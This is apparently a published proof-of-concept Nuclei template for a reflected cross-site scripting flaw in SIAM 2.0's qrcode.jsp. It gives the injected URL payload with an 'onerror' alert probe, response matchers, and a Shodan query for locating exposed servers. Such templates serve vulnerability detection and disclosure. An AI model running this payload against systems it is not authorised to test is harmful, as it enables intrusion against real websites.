A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the SIAM Invitation application. The url parameter of the qrcode.jsp page does not properly sanitize user input, allowing the injection and execution of malicious scripts in the browser.
PoC代码[已公开]
id: siam-xss
info:
name: SIAM 2.0 - Cross-Site Scripting
author: 3th1c_yuk1
severity: medium
description: |
A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the SIAM Invitation application. The url parameter of the qrcode.jsp page does not properly sanitize user input, allowing the injection and execution of malicious scripts in the browser.
reference:
- https://vuldb.com/?submit.496171
- https://ftp.ogma.in/blog/understanding-and-mitigating-cve-2025-1359-siam-2-0-vulnerabilities
metadata:
verified: true
max-request: 1
shodan-query: html:"siam-convite"
tags: siam,convite,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}/siam-convite/qrcode.jsp?url=1%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>'
- 'SIAM</a>'
condition: and
- type: word
part: content_type
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a0046304402204c0ea4f7d21cf81d2216b7cf99c3f15c7ed582f0985520d8edd95f251019ef8e02205efd210221e7326749bf4e23aa5ef05895c97a71321bcf4a6d6b95dc3ad759d9:922c64590222798bb761d5b6d8e72950